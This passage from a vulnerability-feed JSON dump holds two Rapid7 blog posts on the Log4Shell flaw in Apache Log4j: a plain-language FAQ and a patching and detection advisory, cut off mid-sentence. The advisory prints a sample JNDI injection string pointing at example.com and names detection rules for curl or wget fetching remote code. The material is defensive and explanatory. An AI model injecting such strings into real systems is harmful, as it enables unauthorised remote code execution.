purposes. Remote code execution vulnerabilities are always concerning, but you hope that they will be complicated to exploit and require specialist technical skill, limiting who can take advantage of them and slowing down the pace of attacks so that defenders can ideally take remediation action first. That\u2019s not the case with Log4Shell. The Log4j tool is designed to send whatever data is inputted in the right format, so as long as attackers know how to form their commands into that format (which is not a secret), they can take advantage of this bug, and they currently are doing just that.\n\n## That sounds pretty bad. Is the situation hopeless?\n\nDefinitely not. The good news is that the Apache Foundation has [updated Log4j](<https://logging.apache.org/log4j/2.x/changes-report.html#a2.16.0>) to address the vulnerability. All organizations urgently need to check for the presence of this vulnerability in their environment and update affected systems to the latest patched version.\n\nThe first update \u2014 version 2.15.0 \u2014 was released on December 6, 2021. As exploitation ramped up in the wild, it became clear that the update did not fully remediate the issue in all use cases, a vulnerability that the National Vulnerability Database (NVD) codified as [CVE-2021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046>).\n\nAs a result, on December 13, the Apache Foundation released [version 2.16.0](<https://logging.apache.org/log4j/2.x/changes-report.html#a2.16.0>), which completely removes support for message lookup patterns, thus slamming the door on JNDI functionality completely and possibly adding to development team backlogs to update material sections on their codebase that handle logging.\n\n## That sounds straightforward, right?\n\nUnfortunately, it\u2019s likely going to be a pretty huge undertaking and likely require different phases of discovery and remediation/mitigation.\n\n### Remediation\n\nThe first course of action is to identify all vulnerable applications, which can be a mix of vendor-supplied solutions and in-house developed applications. NCSC NL is [maintaining a list](<https://github.com/NCSC-NL/log4shell/blob/main/software/README.md>) of impacted software, but organizations are encouraged to monitor vendor advisories and releases directly for the most up-to-date information.\n\nFor in-house developed applications, organizations \u2014 at a minimum \u2014 need to update their Log4j libraries to the latest version (which, as of 2021-12-14, is 2.16) and apply the mitigations described in Rapid7's [initial blog post on CVE-2021-44228](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j>), which includes adding a parameter to all Java startup scripts and strongly encourages updating Java virtual machine installations to the latest, safest versions. An additional resource, published by the Apache Security Team, provides a [curated list of all affected Apache projects](<https://blogs.apache.org/security/entry/cve-2021-44228>), which can be helpful to expedite identification and discovery.\n\nIf teams are performing \"remote\" checks (i.e., exploiting the vulnerability remotely as an attacker would) versus local filesystems \"authenticated\" checks, the remote checks should be both by IP address and by fully qualified domain name/virtual host name, as there may be different routing rules in play that scanning by IP address alone will not catch.\n\nThese mitigations must happen everywhere there is a vulnerable instance of Log4j. Do not assume that the issue applies only to internet-facing systems or live-running systems. There may be batch jobs that run hourly, daily, weekly, monthly, etc., on stored data that may contain exploit strings that could trigger execution.\n\n### Forensics\n\nAttacks have been active since at least December 1, 2021, and there is evidence this weakness has been known about since at least March of 2021. Therefore, it is quite prudent to adopt an \"assume breach\" mindset. NCSC NL has a [great resource page](<https://github.com/NCSC-NL/log4shell/blob/main/mitigation/README.md>) on ways you can detect exploitation attempts from application log files. Please be aware that this is not just a web-based attack. Initial, quite public, exploit showcases included changing the name of iOS devices and Tesla cars. Both those companies regularly pull metadata from their respective devices, and it seems those strings were passed to Log4j handlers somewhere in the processing chain. You should review logs from all internet-facing systems, as well as anywhere Log4j processing occurs.\n\nExploitation attempts will generally rely on pulling external resources in (as is the case with any attack after gaining initial access), so behavioral detections may have already caught or stopped some attacks. The Log4j weakness allows for rather clever data exfiltration paths, especially DNS. Attackers are pulling values from environment variables and files with known filesystems paths and creating dynamic domain names from them. That means organizations should review DNS query logs going as far back as possible. Note: This could take quite a bit of time and effort, but it must be done to ensure you're not already a victim.\n\n### Proactive response\n\nOut of an abundance of caution, organizations should also consider re-numbering critical IP segments (where Log4j lived), changing host names on critical systems (where Log4j lived), and resetting credentials \u2014 especially those associated with Amazon AWS and other cloud providers \u2014 in the event they have already been exfiltrated.\n\n## Who should be paying attention to this?\n\nPretty much every organization, regardless of size, sector, or geography. If you have any kind of web presence or internet connectivity, you need to pay attention and check your status. If you outsource all the technical aspects of your business, ask your vendors what they are doing about this issue.\n\n## Who is exploiting it and how?\n\nKind of\u2026 _everyone_.\n\n\u201cBenign\u201d researchers (some independent, some part of cybersecurity firms) are using the exploit to gain an initial understanding of the base internet-facing attack surface.\n\n[Cyberattackers are also very active](<https://www.rapid7.com/blog/post/2021/12/14/log4j-makes-its-appearance-in-hacker-chatter-4-observations/>) and are racing to take advantage of this vulnerability before organizations can get their patches in place. Botnets, such as Mirai, have been adapted to use the exploit code to both exfiltrate sensitive data and gain initial access to systems (some deep within organizations).\n\nRansomware groups have already sprung into action and weaponized the Log4j weakness to compromise organizations. Rapid7\u2019s Project Heisenberg is [collecting and publishing samples](<https://github.com/rapid7/data/blob/master/log4shell/heisenberg/exploit-strings.txt>) of all the unique attempts seen since December 11, 2021.\n\n## How are things likely to develop?\n\nThese initial campaigns are only the beginning. Sophisticated attacks from more serious and capable groups will appear over the coming days, weeks, and months, and they\u2019ll likely focus on more enterprise-grade software that is known to be vulnerable.\n\nMost of the initial attack attempts are via website-focused injection points (input fields, search boxes, headers, etc.). There will be more advanced campaigns that hit API endpoints (even \u201chidden\u201d APIs that are part of company mobile apps) and try to find sneaky ways to get exploit strings past gate guards (like the iOS device renaming example).\n\nEven organizations that have remediated deployed applications might miss some virtual machine or container images that get spun up regularly or infrequently. The Log4Shell attacks are easily automatable, and we\u2019ll be seeing them as regularly as we see WannaCry and Conficker (yes, we still see quite a few exploits on the regular for those vulnerabilities).\n\n## Do we need to worry about similar vulnerabilities in other systems?\n\nIn the immediate term, security teams should narrow their attention to identify systems with the affected Log4j packages.\n\nFor the longer term, while it is impossible to forecast identification of similar vulnerabilities, we do know the ease and prevalence of CVE-2021-44228 demands the _continued_ attention (been a long weekend for many) of security, infrastructure, and application teams.\n\nAlong with Log4Shell, we also have [CVE-2021-4104](<https://access.redhat.com/security/cve/CVE-2021-4104>) \u2014 reported on December 9, 2021 \u2014 a flaw in the Java logging library Apache Log4j in version 1.x. JMSAppender that is vulnerable to deserialization of untrusted data. This allows a remote attacker to execute code on the server if the deployed application is configured to use JMSAppender and to the attacker's JMS Broker. Note this flaw only affects applications that are specifically configured to use JMSAppender, which is not the default, or when the attacker has write-access to the Log4j configuration for adding JMSAppender to the attacker's JMS Broker.\n\nExploit vectors of Log4Shell and mitigations reported on Friday continue to evolve as [reported](<https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/>) by our partners at Snyk.io and Java Champion, Brian Vermeer \u2014 see \u201cEditor\u2019s note (Dec. 13, 2021)\u201d \u2014 therefore, continued vigilance on this near and present threat is time well spent. Postmortem exercises (and there will be many) should absolutely include efforts to evolve software, open-source, and package dependency inventories and, given current impacts, better model threats from packages with similar uninspected lookup behavior.\n\n## Does this issue indicate that we should stop compiling systems and go back to building from scratch?\n\nThere definitely has been chatter regarding the reliance upon so many third-party dependencies in all areas of software development. We've seen many attempts at poisoning numerous ecosystems this year, everything from Python to JavaScript, and now we have a critical vulnerability in a near-ubiquitous component.\n\nOn one hand, there is merit in relying solely on code you develop in-house, built on the core features in your programming language of choice. You can make an argument that this would make attackers\u2019 lives harder and reduce the bang they get for their buck.\n\nHowever, it seems a bit daft to fully forego the volumes of pre-built, feature-rich, and highly useful components. And let\u2019s not forget that not all software is created equally. The ideal is that community built and shared software will benefit from many more hands to the pump, more critical eyes, and a longer period to mature.\n\nThe lesson from the Log4Shell weakness seems pretty clear: Use, but verify, and support! Libraries such as Log4j benefit from wide community adoption, since they gain great features that can be harnessed quickly and effectively. However, you cannot just assume that all is and will be well in any given ecosystem, and you absolutely need to be part of the community vetting change and feature requests. If more eyes were on the initial request to add this fairly crazy feature (dynamic message execution) and more security-savvy folks were in the approval stream, you would very likely not be reading this post right now (and it'd be one of the most boring Marvel \"What If\u2026?\" episodes ever).\n\nOrganizations should pull up a seat to the table, offer code creation and review support, and consider funding projects that become foundational or ubiquitous components in your application development environment.\n\n## How would a Software Bill of Materials (SBOM) have impacted this issue?\n\nA Bill of Materials is an inventory, by definition, and conceptually should contribute to speeding the discovery timeline during emergent vulnerability response exercises, such as the Log4j incident we are communally involved in now.\n\nAn SBOM is intended to be a formal record that contains the details and supply chain relationships of various components used in software, kind of like an ingredients list for technology. In this case, those components would include java libraries used for logging (e.g. Log4j2).\n\nSBOM requirements were included in the [US Executive Order](<https://www.rapid7.com/blog/post/2017/05/12/white-house-cybersecurity-executive-order-summary/>) issued in May 2021. While there may be international variations, the concept and intended objects are uniform. For that reason, I will reference US progress for simplicity.\n\n_From: The Minimum Elements For a Software Bill of Materials (SBOM), issued Department of Commerce, in coordination with the National Telecommunications and Information Administration (NTIA), Jul 12, 2021_\n\n\n\nThe question many Log4Shell responders \u2014 including CISOs, developers, engineers, sys admins, clients, and customers \u2014 are still grappling with is simply where affected versions of Log4j are in use within their technical ecosystems. Maintaining accurate inventories of assets has become increasingly challenging as our technical environments have become more complicated, interconnected, and wide-reaching. Our ever-growing reliance on internet-connected technologies, and the rise of shadow IT only make this problem worse.\n\nVulnerabilities in tools like Log4j, which is used broadly in a vast array of technologies and systems, highlight the need for more transparency and automation for asset and inventory management. Perhaps the longer-term substantive impact from Log4Shell will be to refocus investments and appreciation for the cruciality of an accurate inventory of software and associated components through an SBOM that can easily be queried and linked to dependencies.\n\nThe bottom line is that if we had lived in a timeline where SBOMs were required and in place for all software projects, identifying impacted products, devices, and ecosystems would have been much easier than it has been for Log4Shell and remediation would likely be faster and more effective.\n\n## How does Log4Shell impact my regulatory status \u2014 do I need to take special action to ensure compliance?\n\nAccording to Rapid7\u2019s resident policy and compliance expert, Harley Geiger, \u201cRegulators may not have seen Log4Shell coming, but now that the vulnerability has been discovered, there will be an expectation that regulated companies address it. As organizations' security programs address this widespread and serious vulnerability, those actions should be aligned with compliance requirements and reporting. For many regulated companies, the discovery of Log4Shell triggers a need to re-assess the company's risks, the effectiveness of their safeguards to protect sensitive systems and information (including patching to the latest version), and the readiness of their incident response processes to address potential log4j exploitation. Many regulations also require these obligations to be passed on to service providers. If a Log4j exploitation results in a significant business disruption or breach of personal information, regulations may require the company to issue an incident report or breach notification.\u201d\n\n## We also asked Harley whether we\u2019re likely to see a public policy response. Here\u2019s what he said\u2026\n\n\u201cOn a federal policy level, organizations should expect a renewed push for adoption of SBOM to help identify the presence of Log4j (and other vulnerabilities) in products and environments going forward. CISA has also required federal agencies to expedite mitigation of Log4j and has ramped up information sharing related to the vulnerability. This may add wind to the sails of cyber incident reporting legislation that is circulating in Congress at present.\u201d\n\n## How do we know about all of this?\n\nWell, a bunch of kids started wreaking havoc with Minecraft servers, and things just went downhill from there. While there is some truth to that, the reality is that an issue was filed on the Log4j project in late November 2021. Proof-of-concept code was released in early December, and active attacks started shortly thereafter. Some cybersecurity vendors have evidence of preliminary attacks starting on December 1, 2021.\n\nAnyone monitoring the issue discussions (something both developers, defenders, and attackers do on the regular) would have noticed the gaping hole this \u201cfeature\u201d created.\n\n## How long has it been around?\n\nThere is evidence of a request for this functionality to be added dating back to 2013. A talk at Black Hat USA 2016 mentioned several JNDI injection remote code execution vectors in general but did not point to Log4j directly.\n\nSome proof-of-concept code targeting the JNDI lookup weakness in Log4j 2.x was also discovered back in March of 2021.\n\nFear, Uncertainty, and Doubt (FUD) is in copious supply today and likely to persist into the coming weeks and months. While adopting an \u201cassumed breach\u201d mindset isn\u2019t relevant for every celebrity vulnerability, the prevalence and transitive dependency of the Log4j library along with the sophisticated obfuscation exploit techniques we are witnessing in real time point out that the question we should be considering isn\u2019t, \u201cHow long has it been around?\u201d Rather, it is, \u201cHow long should we be mentally preparing ourselves (and setting expectations) to clean it up?\u201d\n\n_We are adding more questions as they come our way. If you have questions you\u2019d like answered, please let us know._\n\n**[UPDATE: December 17, 2021, 6 PM ET]**\n\n## I\u2019ve heard that the update doesn\u2019t work and you can still be exploited even if you have updated? Should I panic?\n\nIf you\u2019ve updated to either v2.15 (the original fix) or [v2.16](<https://logging.apache.org/log4j/2.x/changes-report.html#a2.16.0>) (the latest fix), you don\u2019t need to panic. It\u2019s true that the v2.15 update \u201cwas incomplete in certain non-default configurations,\u201d and that was designated as a separate vulnerability: CVE-2021-45046. But the key words here are** \u201cin certain non-default configurations.\u201d**\n\nEssentially, when a logging configuration uses a non-default Pattern Layout with a Context Lookup, attackers with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern. This can result in DoS attacks, and we\u2019ve now discovered it can also result in information leaks, and in some specific cases, RCE. This has resulted in the vulnerability being upgraded from a CVSS score of 3.7 to 9.0 on the [Apache Foundation website](<https://logging.apache.org/log4j/2.x/security.html>) \u2013 but the RCE is currently only being [reported for macOS](<https://twitter.com/GossiTheDog/status/1471791074314276867?s=20>), and no in-the-wild-exploitation has been publicly reported, so it still isn\u2019t time to panic. The bottom line is that you do need to update to v2.17 as soon as you can, but unless you have those non-default configurations, v2.15 probably has you covered.\n\n## I\u2019ve heard that there\u2019s now evidence of ransomware attacks against this vulnerability. Should I panic?\n\nIt is true that reports have started to appear of the ransomware group, Conti, leveraging CVE-2021-44228 (Log4Shell) to mount attacks. According to a [report](<https://www.advintel.io/post/ransomware-advisory-log4shell-exploitation-for-initial-access-lateral-movement>) from AdvIntel, Conti is testing exploitation by targeting vulnerable Log4j2 instances in VMware vCenter \u201cfor lateral movement directly from the compromised network resulting in vCenter access affecting US and European victim networks from the pre-existent Cobalt Strike sessions.\u201d While it\u2019s not time to panic about this, we do expect to see much more widespread ransom-based exploitation to follow in coming weeks, and this is another reason to ensure you are on the latest version ([v2.17](<https://logging.apache.org/log4j/2.x/changes-report.html#a2.17.0>)) as soon as possible.\n\n## Is it OK to scan for vulnerable applications or systems?\n\nIf you own or lease systems and have appropriate authorization, it is absolutely fine to scan to identify vulnerable applications or systems \u2013 in fact, we strongly recommend you do so in your own environments so you can get patching.\n\nBeyond that, while laws vary by country, most anti-hacking laws revolve around not exceeding authorized access or accessing systems without authorization, so scanning someone else\u2019s assets without permission may fall foul of the law.\n\nFor example, as our resident US public policy expert, Harley Geiger, explains in [this tweet,](<https://twitter.com/HarleyGeiger/status/1471205153273438211?s=20>) under the US anti-hacking law, the Computer Fraud and Abuse Act (CFAA), \u201cIf the test involves unauthorized exfiltration of nonpublic data from a target system or causes a target system to download your executable code w/o authorization, even if done in good faith, stop &amp; make friends w a lawyer.\u201d\n\n \n\n\n#### Get more critical insights about defending against Log4Shell\n\n[Check out our resource center](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T19:44:42", "type": "rapid7blog", "title": "The Everyperson\u2019s Guide to Log4Shell (CVE-2021-44228)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-4428", "CVE-2021-45046"], "modified": "2021-12-15T19:44:42", "id": "RAPID7BLOG:9CB105938BDE92F573A2DE68BC20CF46", "href": "https://blog.rapid7.com/2021/12/15/the-everypersons-guide-to-log4shell-cve-2021-44228/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-03T23:06:28", "description": "### Table of Contents\n\n * \n\nOverview\n\n * Affected versions\n\n * Mitigation and detection guidance\n\n * Rapid7 customers\n\n * InsightVM and Nexpose\n\n * InsightIDR and Managed Detection and Response\n\n * Velociraptor\n\n * tCell\n\n * InsightCloudSec\n\n * IntSights\n\n * Attacks and campaigns\n\n * External resources\n\n * Updates\n\n* * *\n\n**Need clarity on detecting and mitigating the Log4j vulnerability? Visit our [Log4Shell Resource Center](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>).**\n\n_Rapid7 is continuously monitoring our environment for Log4Shell vulnerability instances and exploit attempts. At this time, we have not detected any successful exploit attempts in our systems or solutions. For further information and updates about our internal response to Log4Shell, please see our post [here](<https://www.rapid7.com/blog/post/2021/12/14/update-on-log4shells-impact-on-rapid7-solutions-and-systems/>)._\n\n_Information and exploitation of this vulnerability are evolving quickly. We will update this blog with further information as it becomes available._ \n \n\n\n## Overview\n\nCVE | Vendor Advisory | AttackerKB | IVM Content | Patching Urgency | Last Update \n---|---|---|---|---|--- \nCVE-2021-44228 | [Apache Advisory](<https://logging.apache.org/log4j/2.x/security.html#Fixed_in_Log4j_2.15.0>) | [AttackerKB](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228/rapid7-analysis?referrer=blog>) | Authenticated, remote, and agent checks are available in InsightVM, along with Container Security assessment. | Immediately (emergency) | January 3, 2022 5:15 PM ET \n \n\n\nOn December 6, 2021, Apache [released](<https://logging.apache.org/log4j/2.x/security.html#Fixed_in_Log4j_2.15.0>) version 2.15.0 of their Log4j framework, which included a fix for [CVE-2021-44228](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228>), a critical (CVSSv3 10) remote code execution (RCE) vulnerability affecting Apache Log4j 2.14.1 and earlier versions. The vulnerability resides in the way specially crafted log messages were handled by the Log4j processor. Untrusted strings (e.g. those coming from input text fields, such as web application search boxes) containing content like `${jndi:ldap://example.com/a}` would trigger a remote class load, message lookup, and execution of the associated content if message lookup substitution was enabled. On December 13, 2021, Apache released Log4j 2.16.0, which no longer enables lookups within message text by default\n\nSuccessful exploitation of CVE-2021-44228 can allow a remote, unauthenticated attacker to take full control of a vulnerable target system. CVE-2021-44228 is being [broadly](<https://twitter.com/GreyNoiseIO/status/1469326260803416073>) and [opportunistically](<https://twitter.com/balgan/status/1469313802235752454?s=21>) exploited in the wild as of December 10, 2021. Multiple sources have noted both scanning and exploit attempts against this vulnerability. Rapid7 researchers have developed and tested a proof-of-concept exploit that works against the latest Struts2 Showcase (2.5.27) running on Tomcat. We expect attacks to continue and increase: Defenders should invoke emergency mitigation processes as quickly as possible. CISA has also published [an alert](<https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/apache-releases-log4j-version-2150-address-critical-rce>) advising immediate mitigation of CVE-2021-44228.\n\nA huge swath of products, frameworks, and cloud services implement Log4j, which is a popular Java logging library. Organizations should be prepared for a continual stream of downstream advisories from third-party software producers who include Log4j among their dependencies.\n\n## Affected versions\n\nAccording to [Apache\u2019s advisory](<https://logging.apache.org/log4j/2.x/security.html#Fixed_in_Log4j_2.15.0>), **all** Apache Log4j (version 2.x) versions up to 2.14.1 are vulnerable if message lookup substitution was enabled.\n\n## Mitigation and detection guidance\n\nSecurity teams and network administrators should update to Log4j 2.17.0 immediately, invoking **emergency** patching and/or incident response procedures to identify affected systems, products, and components and remediate this vulnerability with the highest level of urgency. They should also monitor web application logs for evidence of attempts to execute methods from remote codebases (i.e. looking for `jndi:ldap` strings) and local system events on web application servers executing `curl` and other, known remote resource collection command line programs. Furthermore, we recommend paying close attention to security advisories mentioning Log4j and prioritizing updates for those solutions.\n\nAccording to [Apache\u2019s advisory for CVE-2021-44228](<https://logging.apache.org/log4j/2.x/security.html#Fixed_in_Log4j_2.15.0>), the behavior that allows for exploitation of the flaw has been disabled by default starting in version 2.15.0. Apache later updated their advisory to note that the fix for CVE-2021-44228 was incomplete in certain non-default configurations. CVE-2021-45046 has been issued to track the incomplete fix, and both vulnerabilities have been mitigated in Log4j 2.16.0. An additional Denial of Service (DoS) vulnerability, CVE-2021-45105, was later fixed in version 2.17.0 of Log4j.\n\n * In releases &gt;=2.10, this behavior can be mitigated by setting either the system property `log4j2.formatMsgNoLookups` or the environment variable `LOG4J_FORMAT_MSG_NO_LOOKUPS` to `true`.\n * For releases &gt;=2.7 and &lt;=2.14.1, all `PatternLayout` patterns can be modified to specify the message converter as `%m{nolookups}` instead of just `%m`.\n * For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`.\n\nJava 8u121 (see <https://www.oracle.com/java/technologies/javase/8u121-relnotes.html>) protects against RCE by defaulting `com.sun.jndi.rmi.object.trustURLCodebase` and `com.sun.jndi.cosnaming.object.trustURLCodebase` to `false`.\n\nAccording to a [translated technical blog post](<https://www-cnblogs-com.translate.goog/yyhuni/p/15088134.html?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US>), JDK versions greater than 6u211, 7u201, 8u191, and 11.0.1 are not affected by the LDAP attack vector. `com.sun.jndi.ldap.object.trustURLCodebase` is set to `false`, meaning JNDI cannot load a remote codebase using LDAP. In Log4j releases &gt;=2.10, this behavior can be mitigated by setting system property `log4j2.formatMsgNoLookups` to `true` or by removing the `JndiLookup` class from the classpath (e.g. `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`). Java 8u121 protects against RCE by defaulting `com.sun.jndi.rmi.object.trustURLCodebase` and `com.sun.jndi.cosnaming.object.trustURLCodebase` to `false`. Rapid7 researchers are working to validate that upgrading to higher JDK/JRE versions does fully mitigate attacks.\n\nRapid7 Labs, Managed Detection and Response (MDR), and tCell teams recommend filtering inbound requests that contain the string \u201c`${jndi:`\u201d in any inbound request and monitoring all application and web server logs for similar strings.\n\nEmergentThreat Labs has [made Suricata and Snort IDS coverage](<https://twitter.com/ET_Labs/status/1469339963871354884?s=20>) for known exploit paths of CVE-2021-44228.\n\nResearchers are maintaining a [public list of known affected vendor products and third-party advisories](<https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592>) releated to the Log4j vunlerability.\n\n## Rapid7 customers\n\n### InsightVM and Nexpose\n\n[Update: December 17, 2021 4:50pm ET]\n\n**Authenticated and Remote Checks** \nInsightVM version 6.6.121 supports authenticated scanning for Log4Shell on Linux and Windows systems. After installing the product updates, restart your console and engine.\n\n * **Unix and Windows:** `apache-log4j-core-cve-2021-44228` authenticated vulnerability check performs a complete file system search for vulnerable versions of the Log4j on Linux and Windows systems. Windows file system search must be enabled in the scan template for the authenticated check to run in Windows environments.\n * **Windows, Linux, Mac:** `apache-log4j-core-cve-2021-44228-remote` unauthenticated vulnerability check attempts to trigger a connection back to the scan engine to determine vulnerability.\n\nVersion 6.6.121 also includes the ability to disable remote checks.\n\n**Agent checks** \n[Insight Agent version 3.1.2.36](<https://docs.rapid7.com/release-notes/insightagent/20211212/>) was released on December 12, 2021 and includes collection support for Log4j JAR files on **Mac and Linux** systems so that vulnerability assessments of the authenticated check for CVE-2021-44228 will work for updated Agent-enabled systems.\n\nInsight Agent collection on **Windows** for Log4j began rolling out in version 3.1.2.38 as of December 17, 2021. It will take several days for this roll-out to complete.\n\n * If you are using the Insight Agent to assess your assets for vulnerabilities and you are not yet on version 3.1.2.38, you can uncheck the \u201c[Skip checks performed by the Agent](<https://docs.rapid7.com/insightvm/enable-complementary-scanning-for-scan-engines-and-insight-agents/>)\u201d option in the scan template to ensure that authenticated checks run on Windows systems.\n * If you rely on the Insight Agent for vulnerability management, consider setting the Throttle level to High (which is the default) to ensure updates are applied as quickly as possible.\n\n**Containers** \nInsightVM customers utilizing [Container Security](<https://www.rapid7.com/products/insightvm/features/container-security/>) can assess containers that have been built with a vulnerable version of the library.\n\n### InsightIDR and Managed Detection and Response\n\nRapid7 InsightIDR has several detections that will identify common follow-on activity used by attackers. Additionally, our teams are reviewing our detection rule library to ensure we have detections based on any observed attacker behavior related to this vulnerability seen by our Incident Response (IR), MDR, and Threat Intelligence and Detection Engineering (TIDE) teams. Through continuous collaboration and threat landscape monitoring, we ensure product coverage for the latest techniques being used by malicious actors.\n\n * [Update: December 10, 2021 3:30pm ET] \n * Our Threat Detection &amp; Response team has deployed detection rules to help identify attacker behavior related to this vulnerability: \n * Attacker Technique - Curl or Wget To Public IP Address With Non Standard Port\n * Suspicious Process - Curl or WGet Pipes Output to Shell\n * We also identified an existing detection rule that that was providing coverage prior to identification of the vulnerability: \n * Suspicious Process - Curl to External IP Address\n * [Update: December 10, 2021 7:00pm ET] \n * An additional rule has been deployed: \n * Attacker Technique - Curl Or WGet To External IP Reporting Server IP In URL\n\n### Velociraptor\n\nA [Velociraptor artifact](<https://docs.velociraptor.app/exchange/artifacts/pages/log4jrce/>) has been added that can be used to hunt against an environment for exploitation attempts against log4j RCE vulnerability. A second [Velociraptor artifact](<https://docs.velociraptor.app/exchange/artifacts/pages/log4jrcehash/>) that looks for certain known-vulnerable JAR files was also added on December 12, 2021. A third [Velociraptor artifact](<https://docs.velociraptor.app/exchange/artifacts/pages/log4jrce_jndilookup/>) is now available and will run Yara rules across JAR files and report on the vulnerable class.\n\n### tCell\n\nAlong with the guidance below, our tCell team has a new, [longer blog post](<https://www.rapid7.com/blog/post/2021/12/15/how-to-protect-your-applications-against-log4shell-with-tcell/>) on these detections and how to use them to safeguard your applications.\n\n***New* Pattern update for monitoring rule**\n\nFor tCell customers, we have updated our AppFirewall patterns to detect log4shell. This means customers can view monitoring events in the App Firewall feature of tCell should log4shell attacks occur.\n\n***New* Default pattern to configure a block rule **\n\nIn order to protect your application against any exploit of Log4j, we\u2019ve added a default pattern (**tc-cdmi-4)** for customers to block against. Below is the video on how to set up this custom block rule (don\u2019t forget to deploy!), or reach out to the tCell team if you need help with this. As research continues and new patterns are identified, they will automatically be applied to** tc-cdmi-4 **to improve coverage.\n\n\n\n**Identify vulnerable packages and enable OS Commands**\n\ntCell will alert you if any [vulnerable packages](<https://docs.rapid7.com/tcell/packages-and-vulnerabilities>) (such as **CVE 2021-44228**) are loaded by the application.\n\ntCell Customers can also enable blocking for [OS commands](<https://docs.rapid7.com/tcell/os-commands>). This will prevent a wide range of exploits leveraging things like curl, wget, etc. Please note, for those customers with apps that have executables, ensure you\u2019ve included it in the policy as allowed, and then enable blocking.\n\n### InsightCloudSec\n\nThe InsightCloudSec and InsightVM integration will identify cloud instances which are vulnerable to CVE-2021-44228 in InsightCloudSec. Customers can use the context and enrichment of ICS to identify instances which are exposed to the public or attached to critical resources. \n\nApplying two Insight filters \u2014 `Instance Vulnerable To Log4Shell` and `Instance On Public Subnet Vulnerable To Log4Shell` \u2014 will enable identification of publicly exposed vulnerable assets and applications.\n\nInsightCloudSec Filters for Log4J/Log4Shell Vulnerabilities \n\n\n### IntSights\n\nIntSights researchers [have provided a perspective](<https://www.rapid7.com/blog/post/2021/12/14/log4j-makes-its-appearance-in-hacker-chatter-4-observations/>) on what's happening in criminal forums with regard to Log4Shell and will continue to track the attacker's-eye view of this new attack vector.\n\n## Attacks and campaigns\n\nRapid7 Labs is now maintaing a [regularly updated list of unique Log4Shell exploit strings](<https://github.com/rapid7/data/blob/master/log4shell/heisenberg/exploit-strings.txt>) as seen by Rapid7's Project Heisenberg.\n\nBitdefender has details of [attacker campaigns](<https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild>) using the Log4Shell exploit for Log4j. Their technical advisory noted that the Muhstik Botnet, and XMRIG miner have incorporated Log4Shell into their toolsets, and they have also seen the Khonsari ransomware family adapted to use Log4Shell code.\n\n## External resources\n\nThe following resources are not maintained by Rapid7 but may be of use to teams triaging Log4j/Log4Shell exposure.\n\nCISA [now maintains a list of affected products/services](<https://github.com/cisagov/log4j-affected-db>) that is updated as new information becomes available.\n\nCISA also has [posted a dedicated resource page](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) for Log4j info aimed mostly at Federal agencies, but consolidates and contains information that will be used to protectors in any organization.\n\nShadowServer is a non-profit organization that offers [free Log4Shell exposure reports to organizations](<https://www.shadowserver.org/news/log4j-scanning-and-cve-2021-44228-exploitation-latest-observations-2021-12-16/>).\n\nNCSC NL maintains a regularly updated list of [Log4j/Log4Shell triage and information resources](<https://github.com/NCSC-NL/log4shell>).\n\n## Updates\n\n[December 10, 2021, 5:45pm ET] \nRapid7 has posted a technical analysis of [CVE-2021-44228 on AttackerKB](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228/rapid7-analysis?referrer=blog>).\n\n[December 11, 2021, 11:15am ET] \nAdded additional resources for reference and minor clarifications.\n\n[December 11, 2021, 4:30pm ET] \nVMware has [published an advisory](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>) listing 30 different VMware products vulnerable to CVE-2021-44228, including vCenter Server, Horizon, Spring Cloud, Workspace ONE Access, vRealize Operations Manager, and Identity Manager. Their response matrix lists available workarounds and patches, though most are pending as of December 11.\n\nRapid7 has observed indications from the research community that they have already begun investigating RCE exploitability for products that sit in critical places in corporate networks, including network infrastructure solutions like vCenter Server. **VMware customers should monitor [this list](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>) closely and apply patches and workarounds on an emergency basis as they are released.**\n\n[December 11, 2021, 10:00pm ET] \n**Apache Struts 2 Vulnerable to CVE-2021-44228** \nThe Apache Struts 2 framework contains static files (Javascript, CSS, etc) that are required for various UI components. Finding and \u201cserving\u201d these components is handled by the Struts 2 class [DefaultStaticContentLoader](<https://struts.apache.org/maven/struts2-core/apidocs/org/apache/struts2/dispatcher/DefaultStaticContentLoader.html>). The `DefaultStaticContentLoader` is 